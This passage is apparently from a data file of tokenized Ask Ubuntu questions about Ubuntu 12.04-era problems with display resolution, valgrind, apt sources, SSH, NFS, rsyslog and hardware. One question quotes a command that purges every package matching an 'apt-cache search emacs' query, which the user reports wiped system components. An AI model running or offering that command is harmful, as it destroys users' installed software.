] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) ( prog-if 01 ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=32 capabilities : [ 50 ] subsystem : lenovo device 3983 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) subsystem : lenovo device 3983 flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information < ? > 00:1f.2 sata controller : intel corporation n10/ich7 family sata ahci controller ( rev 02 ) ( prog-if 01 ) subsystem : lenovo device 3983 flags : bus master , 66mhz , medium devsel , latency 0 , irq 28 i/o ports at 50c8 [ size=8 ] i/o ports at 50dc [ size=4 ] i/o ports at 50c0 [ size=8 ] i/o ports at 50d8 [ size=4 ] i/o ports at 5020 [ size=16 ] memory at 86104000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 80 ] message signalled interrupts : mask- 64bit- queue=0/0 enable+ capabilities : [ 70 ] power management version 2 kernel driver in use : ahci kernel modules : ahci 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) subsystem : lenovo device 3983 flags : medium devsel , irq 10 i/o ports at 5000 [ size=32 ] kernel modules : i2c-i801 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : lenovo device 3983 flags : bus master , fast devsel , latency 0 , irq 27 i/o ports at 4000 [ size=256 ] memory at 80004000 ( 64-bit , prefetchable ) [ size=4k ] memory at 80000000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] message signalled interrupts : mask- 64bit+ queue=0/0 enable+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ b0 ] msi-x : enable- mask- tabsize=4 capabilities : [ d0 ] vital product data < ? > capabilities : [ 100 ] advanced error reporting < ? > capabilities : [ 140 ] virtual channel < ? > capabilities : [ 160 ] device serial number 00-e0-4c-36-00-00-06-11 kernel driver in use : r8169 kernel modules : r8169 02:00.0 network controller : realtek semiconductor co. , ltd. device 8176 ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device 9196 flags : bus master , fast devsel , latency 0 , irq 10 i/o ports at 3000 [ size=256 ] memory at 84000000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] message signalled interrupts : mask- 64bit+ queue=0/0 enable- capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting < ? > capabilities : [ 140 ] virtual channel < ? > capabilities : [ 160 ] device serial number 00-e0-4c-ff-fe-81-91-01 also , i tried modifying /usr/lib/x11/xorg.conf.d/10-monitor.conf to fix this problem , but still does not work : section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` screen '' identifier `` screen0 '' monitor `` monitor0 '' device `` card0 '' subsection `` display '' viewport 0 0 depth 1 modes `` 1024x768 '' endsubsection subsection `` display '' viewport 0 0 depth 4 modes `` 1024x768 '' endsubsection subsection `` display '' viewport 0 0 depth 8 modes `` 1024x768 '' endsubsection subsection `` display '' viewport 0 0 depth 15 modes `` 1024x768 '' endsubsection subsection `` display '' viewport 0 0 depth 16 modes `` 1024x768 '' endsubsection subsection `` display '' viewport 0 0 depth 24 modes `` 1024x768 '' endsubsection endsection section `` device '' identifier `` card0 '' driver `` vesa '' vendorname `` intel corporation device '' endsection i 'm using gnome . system > preference > monitor screen resolution sticks to 800x600 . what am i going to do ? edit : xrandr -q screen 0 : minimum 800 x 600 , current 800 x 600 , maximum 800 x 600 default connected 800x600+0+0 0mm x 0mm 800x600 0.0*
148229	problem with gconf-editor no button_layout key	my gconf_editor has no button_layout key or any other key only the theme name key is there .
148236	valgrind does debug error	i have been trying to follow the online tutorial for learn c the hard way . however after setting up valgrind ( i followed other links that help setting up valgrind on ubuntu 12.04 ) , when i try to debug the c executable , i find the following errors . ayusman @ ayusman-ubuntu : ~/lcthw $ valgrind ./ex4 ==1984== memcheck , a memory error detector ==1984== copyright ( c ) 2002-2011 , and gnu gpl 'd , by julian seward et al . ==1984== using valgrind-3.7.0 and libvex ; rerun with -h for copyright info ==1984== command : ./ex4 ==1984== valgrind : fatal error at startup : a function redirection valgrind : which is mandatory for this platform-tool combination valgrind : can not be set up . details of the redirection are : valgrind : valgrind : a must-be-redirected function valgrind : whose name matches the pattern : strlen valgrind : in an object with soname matching : ld-linux-x86-64.so.2 valgrind : was not found whilst processing valgrind : symbols from the object with soname : ld-linux-x86-64.so.2 valgrind : valgrind : possible fixes : ( 1 , short term ) : install glibc 's debuginfo valgrind : package on this machine . ( 2 , longer term ) : ask the packagers valgrind : for your linux distribution to please in future ship a non- valgrind : stripped ld.so ( or whatever the dynamic linker .so is called ) valgrind : that exports the above-named function using the standard valgrind : calling conventions for this platform . the package you need valgrind : to install for fix ( 1 ) is called valgrind : valgrind : on debian , ubuntu : libc6-dbg valgrind : on suse , opensuse , fedora , rhel : glibc-debuginfo valgrind : valgrind : can not continue -- exiting now . sorry . ayusman @ ayusman-ubuntu : ~/lcthw $ is there something that i can do to make valgrind finally work ? i have ubuntu 12.04 on virtual box . my laptop is a windows 7 64 bit os .
148238	i am receiving a message saying i have duplicate sources but i ca n't seem to find a duplicate of the line described , any ideas ?	i receive this meassage when i run sudo apt-get update in the terminal : - duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) so i ran the command gksu gedit /etc/apt/sources.list and checked the source to find there was no duplicate , not that i can see anyway . here is the source : - # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise universe deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security restricted main multiverse universe # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //repository.spotify.com stable non-free i can see there are two lines of deb http : //archive.canonical.com/ubuntu precise partner but one has # deb-src at the beginning of it . hashed out no ? i 'm quite new to linux os and have little to none sourced editing skills so any help would be most appreciated . thank you : )
148239	determining which update caused 12.04 to stop working in virtualbox	i run a mac os x 10.7.4 host and i use virtualbox to run an ubuntu 12.04 lts guest . if it 's helpful , it used to be 11.10 and it was updated in the vm when it came out . anyway , today i let the update manager have its way with ubuntu and what resulted was an os unable to run unity ( it falls back to unity 2d ) . i did n't get a google hit with someone having a similar issue , so i figured i 'd ask for advice here . i 'm not used to having to debug issues with failed updates ( since they 're usually flawless , and i 've never operated primarily out of a vm before ) so i 'm not sure what the best route would be to figure out which update caused an issue ( perhaps an update failed and i did n't notice before the os was rebooted ? ) . my hope was that i could at least get it working again by uninstalling then reinstalling virtualbox guest additions ( which did n't work ) but ideally i 'd like to know how i could debug the issue so when it 's a package i have no idea about causes an issue i can debug it . in any case , i can log in but i ca n't use the full unity non-unity2d ( 3d compatible version ) . how can i fix this ? edit : the following is the output of running /usr/lib/nux/unity_support_test -p : anthony : ~ > /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0 '' . error : glx is not available on the system to clarify , 3d acceleration is enabled in virtualbox . there is 128mb of video memory given to the vm . the system was running fine prior to running some routine updates today ( whatever was there via the ubuntu update manager tool ) . afterward , the system is stuck falling back to unity2d mode ( apparently i do n't have `` glx '' anymore ? ) .
148243	broadcom wireless does n't work on an hp mini 110 1199ea under wubi install	i used the windows install for ubuntu today , it all installed easily and automatically but i could not go on the internet . please tell me how to solve this problem . i think it was `` ubuntu desktop 12.04 lts '' but i 'm not sure , i did it today , 8th of june 2012 . i am using the hp mini 110 1199ea . it says 'firmware not found ' or something like that . what is firmware and why is n't it found ? my wireless device seems to be called `` broadcom 802.11b/g wlan '' does that make any sense ?
148245	how can i write files in /opt ?	while trying to install xamp from a tar file using the command : tar xvfz xampp-linux-1.7.7.tar.gz -c /opt , i get the following message : can not mkdir : permission denied where and how do i set permissions ?
148246	apache2 .htaccess	i 'm getting really frustrated today , while trying to just set up my development environement and start doing some actual work . after installing php , apache2 and mysql over apt-get install phpmyadmin i 'm trying since about an hour , to make .htaccess files work in my /var/www/projectname/.htaccess i tried out multiple solutions , that basically told me to edit /etc/apache2/sites-available/default but none of them seemed to work . what i tried : < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none # allowoverride all # allowoverride authconfig fileinfo indexes limit options=all , multiviews order allow , deny allow from all < /directory > the commented lines are what i tried , both didnt work . i either get a 500 internal error ( when i set allowoverride all ) or the .htaccess doesnt do anything . can someone help me here ? i need to get this to work , to finally start working : ) as side note , my knowledge with ubuntu or linux in common , is very slim - i just do what google tells me . cat /etc/issue : ubuntu 11.10
148252	why does wubi installer not find my cd and then abort ?	when i try to install ubuntu 11.10 using wubi i get an error asking to check c : /users/home/appdata/local/temp/wubi-11.10-rev245.log i do n't know what to do . i am not using the internet to install ubuntu . i have ubuntu in .iso format and i install it by keeping wubi and the .iso file in the same folder . here is the log file .
148255	how to add a shortcut to `` update status '' of broadcast/gwibber configuration in ubuntu	in the taskbar at the top of ubuntu , upon clicking the mail icon , there is an option called broadcast which when configured gwibber with twitter account adds up an additional option in the menu just below broadcast called `` update status '' . clicking the update status option pops up a tiny window with textbox to update twitter status . i find this very nice . except that i feel it is more comfortable to have a shortcut configured for this . how do i add it ?
148259	disable trackpad and trackpoint via command line	for my rotation script , i 'd like to disable the trackpoint when i have the screen rotated . it is pretty annoying if the screen is folded onto the keyboard and then moves the mouse with the trackpoint . is there some way to disable ( and enable ) the trackpoint via the command line and keeping the touch and pen input active ?
148272	can nautilus search hidden files/directories ?	i am using ubuntu 12.04 precise pangolin . the search function in nautilus does not show the hidden files or the files in the hidden directories ( like , for example , the unison .prf files in the directory home/.unison ) . there is a way , or a script , to change this behavior ? ( i have tried also with `` gnome-search-tools without any result .
148281	acer aspire timelin m3 : multiple issues	i 've just bought a new acer aspire timeline m3 ultrebook , but i have multiple issues with the new ubuntu 12.04 . my nvidia card wo n't work , unfortunately i found that the problem can not be resolved yet compatibility of new acer aspire m3 with nvidia gt 640m kepler gpu with hybrid graphics ? hibernation does not work and i found nothing useful to resolve this issue my elantech touchpad right button does not work : it seems that everyone has problems with the multitouch features of the touchpad , which luckly work for me , but nobody has my problem . can anyone help me solve those two issues ? oh i forgot : here 's my xinput-list ( my touchpad is detected correctly ) emanuele @ emanuele-note : ~ $ xinput -list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ video bus id=10 [ slave keyboard ( 3 ) ] ↳ hd webcam id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ acer wmi hotkeys id=14 [ slave keyboard ( 3 ) ] and here 's my synclient .l emanuele @ emanuele-note : ~ $ synclient -l parameter settings : leftedge = 130 rightedge = 3130 topedge = 123 bottomedge = 2159 fingerlow = 1 fingerhigh = 1 fingerpress = 256 maxtaptime = 180 maxtapmove = 175 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 79 horizscrolldelta = 79 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0502639 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 318 edgemotionusealways = 0 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 19 verthysteresis = 19 clickpad = 0 i hope these information can be useful .
148286	teamspeak has everything muted in 12.04	ever since the release of 12.04 , teamspeak has not been allowing me to talk or hear . it shows that i have my speakers and my microphone muted/disabled . could this have something to do with pulseaudio ?
148307	bastion unexpectedly exits when i move my cursor	i downloaded the humble indie bundle v , mostly because my friend told me about how great bastion was . when i first installed it , i was getting the seemingly common `` black screen '' error that most people got ( fixed that half with this http : //ubuntuforums.org/showthread.php ? p=11992661 ) . but i also have an error where every time i move my cursor , in any direction , any amount , the game closes instantly . i can use the keyboard no problem , but without fail , every time i move my mouse , it crashes . does anyone know what might be causing this ? has anyone encountered anything like this before ? i am worried it may be a hardware issue , but hoping someone might be able to help me out . i 'm running ubuntu 12.04 on a dell studio 1558 . graphics card is the stock intel graphics card , running on 4 gb of ram .
148319	why is it a risk to clone a luks container ?	i recently installed ubuntu onto an encrypted partition using the luks+lvm combination that the 'alternate ' installer offers . now i want to create backups of my hd . from the luks faq : 6.15 can i clone a luks container ? you can , but it breaks security , because the cloned container has the same header and hence the same master key . you can not change the master key on a luks container , even if you change the passphrase ( s ) , the master key stays the same . that means whoever has access to one of the clones can decrypt them all , completely bypassing the passphrases . how can the existence of a perfect clone of my encrypted hd break security if it contains the exact same information as my live encrypted hd ? in which sense does keeping updated clones of my luks-encrypted hd around `` break security '' ?
148321	how do i stop gui ?	i need to enter the command line alone with no gui to install the official nvidia drivers . i 'm trying to get my computer to work over hdmi and someone on youtube shows how but you have to be in the nvidia settings program .
148327	unable to record sound with recordmyddesktop	i 'm unable to record sound using this application . the check box is checked for the sound , it just does n't record sound . i do n't know what to do . i have ubuntu 12.04 64bit . and nvidia drivers do n't work what so ever . so i 'm just using the default ubuntu drivers . i looked up the site for this application . but they do n't give any instructions on sound for this program . the microphone sound input works with it . but it cant record system sounds .
148330	ubuntu update 11.10 to 12.04 crashed	i was recently trying to update my laptop running on 11.10 to 12.04 in update manager and in the middle of the update , my update froze . so i waited for an hour before i decided to restart my computer . when i restarted it , it had a black , not a purple , screen that kept flashing and i cant do anything . there is absolutely no gui interface and i cant do anything . does anyone know how i can fix this ? i have a disk with ubuntu 11.10 on it . i do n't any files cause i have a backup , i just need the computer working . can you please help me fix this ? thanks !
148334	lost 'system settings ' on ubuntu precise pangolin x86_64	i am new here . i was facing issues with emacs-snapshot sourced from a ppa , so i tried following these instructions ( blindly =/ ) , and sudo apt-get remove `apt-cache search emacs | awk ' { print $ 1 } '` -- purge took out a big chunk of ubuntu 12.04 including software center , system settings and probably a few other things that i am not immediately missing . i was able to install software center back with which i tried to install system settings unsuccessfully ( it tried to install the kde version ) . does anyone know how i can get system settings back without reinstalling ubuntu ? ps : i am also missing the clock on the top-right which is usually next to the menu button containing shutdown/display/etc . settings .
148337	adding a directory to a path in .profile	i am new to ubuntu ( coming from windows 7 ) and i am trying to add a directory to my system path and for some reason i ca n't get it to work . i am using ubuntu version 12.04 lts i tried following this article without success how to add a directory to my path ? here are my steps : in my home directory i am editing the .profile file . under the â # set path so it includes user 's private bin if it existsâ section i added the following : if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path : home/vincent/google_appengine '' fi i logout and log back in . open the terminal window and type in : vincent @ ubuntu : ~ $ dev_appserver.py dev_appserver.py : command not found the directory and files are in the location . what am i doing wrong ?
148346	nfs wo n't mount on boot	i am having trouble getting my nfs to mount on boot . i am running lubuntu 12.04 and mounting from a nas ( synology-if it matters ) . i should add that am very new to using lubuntu or any linux distribution . to mount on boot i tried to add the following to /etc/fstab : 192.168.2.15 : /volume1/family /home/john/nfs-family nfs rw , async , hard 0 0 no luck when the computer mounts , the nfs file does n't mount . i should add that when i use the mount command the nfs mounts just fine . this is the command i use : sudo mount 192.168.2.150 : /volume1/family /home/john/nfs-family any advice would be appreciated .
148348	how to select installing packages via dvd while installing ubuntu ?	i am new to ubuntu ( or linux ) . i have just started to get acquainted with fedora and now i want to switch to ubuntu . i was wondering if i install via dvd , will all the packages ( including developmental tools ) get installed or is there any way to select certain packages ? i want to select a list of tools to install rather than install them one by one .
148353	how do i install or get the dependency libexiv2-12	i am trying to install ufraw as a gimp plug-in and ca n't because i need the libexiv2-12 dependency . how do i install this file so i can install ufraw . i am using ubuntu 12.04 ( i386 )
148356	trying to login to openssh , permission denied	i have been trying to login to ssh on a ubuntu 11.04 server as root with the allowrootlogin thing set to yes but i have been getting a `` permision denied '' heres a copy of my attempt with ssh -v : last login : fri jun 8 21:07:20 on ttys000 noah-sisks-macbook-pro : ~ phreshness $ ssh -v root @ 192.168.1.133 -p 22 openssh_5.6p1 , openssl 0.9.8r 8 feb 2011 debug1 : reading configuration data /etc/ssh_config debug1 : applying options for * debug1 : connecting to 192.168.1.133 [ 192.168.1.133 ] port 22. debug1 : connection established . debug1 : identity file /users/phreshness/.ssh/id_rsa type -1 debug1 : identity file /users/phreshness/.ssh/id_rsa-cert type -1 debug1 : identity file /users/phreshness/.ssh/id_dsa type -1 debug1 : identity file /users/phreshness/.ssh/id_dsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1 debug1 : match : openssh_5.9p1 debian-5ubuntu1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.6 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : host '192.168.1.133 ' is known and matches the rsa host key . debug1 : found key in /users/phreshness/.ssh/known_hosts:6 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : trying private key : /users/phreshness/.ssh/id_rsa debug1 : trying private key : /users/phreshness/.ssh/id_dsa debug1 : next authentication method : password root @ 192.168.1.133 's password : debug1 : authentications that can continue : publickey , password permission denied , please try again . root @ 192.168.1.133 's password :
148358	why does n't my live usb save settings , even though i have a persistence file ?	i have just made a live usb of ubuntu 12.04 on a 4 gb stick . i made it in startup disk creator in 10.04 and set the persistence file to 3 gb . but for some reason it does n't save my settings on shutdown when i use it with my macbook pro . otherwise it works just fine though . any ideas why it does n't save my settings ?
148359	useradd : can not lock /etc/passwd ; try again later	trying to add a user : useradd -c `` test '' -d /home/bbbbbbbb -e `` 01-jan-2013 '' -f 10 -g admin -p secretfgjdhdgd -s /bin/bash -u 123456 blobblob but getting : useradd : can not lock /etc/passwd ; try again later .
148362	how to install ubuntu on h : drive ?	apologies if this question already exist . how to install ubuntu 12.04 on h : drive ? i had boot ubuntu 12.04 from usb and when i click on something else when installing ubuntu it shows some drives like dev/sd1 . in windows xp i have my h : drive ready to be installed with ubuntu . but i do n't know which dev/sdxx is h : drive .
148363	which linux command can i use to test my speakers for current talk radio output ?	which bash command will indicate the sound output speaker ( output or no output ) , so i can reset my web radio when it crashes ?
148365	fn keys for brightness not working on toshiba satellite l755	i am running ubuntu 12.04 and i love it ! the only problem is the keys for my brightness , f6 and f7 , does not work when i am on battery power or ac power . it randomly works after i am idle for a while and log back in . the other weird thing is to see my battery indicator , i need to toggle my touch pad button that is right above the actual pad on and off for it to show up , and then back on so i can use my touch pad , obviously . the only other fn buttons that work on my laptop is the button to mute f1 touch pad on and off f9 and fn+3 and fn+4 for my volume . the only fn buttons that i care if they work again are my brightness , which again , are f6 and f7 thanks ! james
148366	programming with dbus using pyqt	i 'm trying to write a desktop environment that supports the global menu before i get started with my main task in pyqt i 'm trying to get the dbus code to work with qtdbus as a proof of concept . here 's the pretty-printed output and method signature i got from d-feet : getmenus ( ) - > ( array of [ struct of ( uint32 , string , object path ) ] menus ) [ ( 60817412l , u':1.155 ' , '/com/canonical/menu/3a00004 ' ) , ( 58725289l , u':1.151 ' , '/com/canonical/menu/38013a9 ' ) , ( 58720393l , u':1.151 ' , '/com/canonical/menu/3800089 ' ) , ( 62916305l , u':1.159 ' , '/com/canonical/menu/3c006d1 ' ) , ( 54526127l , u':1.129 ' , '/com/canonical/menu/34000af ' ) , ( 58725701l , u':1.151 ' , '/com/canonical/menu/3801545 ' ) , ( 25167093l , u':1.22 ' , '/com/canonical/menu/18004f5 ' ) , ( 58726237l , u':1.151 ' , '/com/canonical/menu/380175d ' ) , ( 60825279l , u':1.155 ' , '/com/canonical/menu/3a01ebf ' ) , ( 58721371l , u':1.151 ' , '/com/canonical/menu/380045b ' ) , ( 25165828l , u':1.22 ' , '/com/canonical/menu/1800004 ' ) ] this is the code i wrote in pyqt expecting something similar : from pyqt4.qtgui import qapplication from pyqt4.qtdbus import qdbus from pyqt4.qtdbus import qdbusconnection from pyqt4.qtdbus import qdbusinterface desktop = qapplication ( [ ] ) session_bus_connection = qdbusconnection.sessionbus ( ) service_name = 'com.canonical.appmenu.registrar' service_path = 'com/canonical/appmenu/registrar' interface = 'com.canonical.appmenu.registrar' menu = qdbusinterface ( service_name , service_path , interface , qdbusconnection.sessionbus ( ) ) reply = menu.call ( 'getmenus ' ) print reply.arguments ( ) desktop.exec_ ( ) this is the output actually i get from the code above : christopher @ xx-pc : ~/documents/code $ python desktop_dbus.py process 2613 : arguments to dbus_message_new_method_call ( ) were incorrect , assertion `` _dbus_check_is_valid_path ( path ) '' failed in file ../../dbus/dbus-message.c line 1204 . this is normally a bug in some application using the d-bus library . process 2613 : arguments to dbus_message_set_auto_start ( ) were incorrect , assertion `` message ! = null '' failed in file ../../dbus/dbus-message.c line 2885 . this is normally a bug in some application using the d-bus library . process 2613 : arguments to dbus_message_iter_init_append ( ) were incorrect , assertion `` message ! = null '' failed in file ../../dbus/dbus-message.c line 2284 . this is normally a bug in some application using the d-bus library . qdbusconnection : error : could not send message to service `` com.canonical.appmenu.registrar '' path `` com/canonical/appmenu/registrar '' interface `` org.freedesktop.dbus.introspectable '' member `` introspect '' : [ ] can anyone tell me why the message is n't being sent ?
148371	how long does an ext4 format take ?	the usb cable on my iomega prestige 1tb hard drive conked out a while back , and i 've finally managed to get a new one . i removed the old ntfs file system because i use windows maybe once a month , and then only for windows-only activities . so i plug in the hdd to my laptop , and get it to start converting to ext4 . gparted is currently on the `` create new ext4 file system '' and has been for about 2 hours . is this right ? i know 1tb is fairly large , but the last time i did this , i 'm pretty sure it was a fast ( er ) job.can anybody shed some light on what 's going on here ?
148375	rsyslog filter for logging router events ( syslog server )	i am trying to configure rsyslog ( ubuntu 12.04 server ) to log events from a router . i found this old ubuntu forum post which got me most of the way there . so far i am able to get the events logged from the router . however since i do n't them logged in /var/log/syslog i am trying to set up a working filter in /etc/rsyslog.conf to put the logged events in /var/log/linksys.log . this is where i am having trouble . first i tried filtering by the router ip address like this : : fromhost-ip , isequal , `` 192.168.2.1 '' /var/log/linksys.log & ~ this successfully redirects the logs as i wanted , the only problem is now i am not getting any sshd logs in auth.log . needless to say this is not acceptable . next i tried filtering by the router name which appears in every event log : : msg , contains , `` rv042 '' /var/log/linksys.log & ~ although this neither logs or blocks anything . so i am stumped . i have no idea why sshd is getting filtered with the : fromhost-ip filter . sshd is local on the machine with rsyslog ( 192.168.2.2 ) . i am thoroughly frustrated by this , any suggestions are much appreciated .
148377	where do i find display brightness controls in lubuntu ?	i 'm looking for a control to be able to change my standard display brightness in lubuntu . i 've tried how do i set default display brightness ? but my system settings does not include a screen option . i 've also tried power manager , monitor settings and screensaver under preferences and could n't spot anything to control this option . the function key mappings ( this is a laptop ) work to change the brightness , but i 'm looking for a ui option as the laptop is physically set up to be mouse-based ( keyboard is hard to access with how we 've got it set up ) .
148381	can not boot after installing 12.04	after i installed ubuntu 12.04 on my laptop , it ca n't boot . i do n't know why . because when i installed it , it said installation succeeded but when i restart , it only shows me the ubuntu desktop image . my laptop specifics : samsung rv520 640 gb hdd 4 gb ram processor : intel core i3 intel hd 1.6 gb
148382	how to install ubuntu on a fresh hard drive	i attempted to install ubuntu from a usb stick to my intel 4 3ghz computer with 80gb hdd . the installer was doing well , then it said something to the effect of `` errors on the source usb , or the target hdd '' the recommendation was to download the installer again . i suspected my hdd was going bad so i figured i would investigate . what i found was a partially formatted 80gb hdd . i repartitioned it via a different computer . now a fresh copy of the ubuntu usb installer is not able to move past the start-up screen ( it freezes ) . i was able to purchase a new / clean hdd , but still the fresh copy of the installer still locks up after the initial opening screen ( locks up after about 2 screens worth of installations steps ) . does this sounds like a hdd nths issue or a cpu/hardware/memory issue ? or should i move to a cd image file rather than my usb stick ? now my computer is stuck ... no os.. no way to go back to windows ( upgrade os cd only ) . any insight would be greatly appreciated . stuck in schenectady herman wiegman
148383	how to resolve `` dpkg : error processing /var/cache/apt/archives/python-apport_2.0.1-0ubuntu9_all.deb '' ?	update manager will not update although i have over 100 updates to do i get a error message like this : installarchives ( ) failed : extracting templates from packages : 29 % % extracting templates from packages : 58 % % extracting templates from packages : 88 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 29 % % extracting templates from packages : 58 % % extracting templates from packages : 88 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 29 % % extracting templates from packages : 58 % % extracting templates from packages : 88 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 29 % % extracting templates from packages : 58 % % extracting templates from packages : 88 % % extracting templates from packages : 100 % % preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 189751 files and directories currently installed . ) preparing to replace python-problem-report 2.0.1-0ubuntu7 ( using ... /python-problem-report_2.0.1-0ubuntu9_all.deb ) ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error processing /var/cache/apt/archives/python-problem-report_2.0.1-0ubuntu9_all.deb ( -- unpack ) : subprocess new 